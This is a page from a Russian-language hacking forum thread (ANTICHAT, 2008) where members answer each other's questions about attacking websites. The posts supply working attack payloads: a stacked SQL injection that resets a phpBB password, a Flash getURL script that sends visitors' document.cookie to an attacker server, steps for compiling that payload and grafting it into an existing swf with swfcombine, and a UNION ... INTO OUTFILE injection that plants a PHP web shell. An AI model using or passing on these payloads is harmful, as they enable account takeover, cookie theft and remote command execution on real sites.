HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 220 из 2438 « Первая < 120170210 216 217 218 219 220 221 222 223 224 2302703207201220 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2191  
Старый 30.05.2008, 21:53
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию
думаю так:
Цитата:
id=2+or+1=+1;update+phpbb_users+SET+user_newpasswd =char(закодируем)+where+user_id=2/*
но помоему невсегда будет работать..
Последний раз редактировалось sabe; 30.05.2008 в 21:56..
 
Ответить с цитированием

  #2192  
Старый 30.05.2008, 21:58
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
Ничего вы этим не сделаете. Я написал выше.
__________________
..
 
Ответить с цитированием

  #2193  
Старый 30.05.2008, 23:46
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию
Цитата:
Сообщение от SeeJay  
И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??

Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java  script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
PHP код:
class hek{
  function hek() {
  }

  static function main(mc) {
    getURL("javascript:alert(document.cookie);");
  }

Далее компилим
Код:
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
заливаем куда надо и всё собственно

Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump
Код:
swfdump.exe hek.swf
компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)
Код:
mtasc.exe -swf hek.swf -main -header x:y:z hek.as
x и y - размеры, z - частота кадров в секунду
и вживляем
Код:
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf
__________________
 
Ответить с цитированием

  #2194  
Старый 31.05.2008, 04:55
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
С нами: 9845611

Репутация: 17
По умолчанию
а уязвимости движков на файлах и на базах сильна отличаются?
 
Ответить с цитированием

  #2195  
Старый 31.05.2008, 05:05
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
Цитата:
Сообщение от Demetra  
а уязвимости движков на файлах и на базах сильна отличаются?
в чем суть вопроса то?
 
Ответить с цитированием

  #2196  
Старый 31.05.2008, 11:40
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
>> а уязвимости движков на файлах и на базах сильна отличаются?

xss/lfi/rfi/exec - остаются такими же в движках на текстовых файлах. Единственное чего нету это sql-inj.
__________________
..
 
Ответить с цитированием

  #2197  
Старый 31.05.2008, 13:33
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
С нами: 9845611

Репутация: 17
По умолчанию
ясна,это хорошо
 
Ответить с цитированием

  #2198  
Старый 31.05.2008, 18:40
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
С нами: 10026761

Репутация: 91
По умолчанию
Подскажите , есть слепок БД одного форума .
Смогу ли я методом INSERT INTO FILE залить туда шелл ?
Если можно с примером , в mysql не силён
Спасибо .
 
Ответить с цитированием

  #2199  
Старый 31.05.2008, 19:11
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию
Термин "слепок БД" мне не знаком. Могу предположить, что это дамп базы. С дампом ты шелл, конечно, не зальешь. Метода INSERT INTO FILE нету =\. В случае с гипотетической инъекцией, можно сделать так: http://site.ru/?id=-1+UNION+SELECT+1,'<?php system($_GET[cmd]); ?>',3+INTO+OUTFILE+'полный путь до файла'/*. Выполнится, если есть file_priv в mysql.user и magic_quotes_gpc=off.
Последний раз редактировалось А®ТеS; 31.05.2008 в 19:16..
 
Ответить с цитированием

  #2200  
Старый 31.05.2008, 21:14
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
С нами: 10026761

Репутация: 91
Question
Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
 
Ответить с цитированием
Ответ
Страница 220 из 2438 « Первая < 120170210 216 217 218 219 220 221 222 223 224 2302703207201220 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...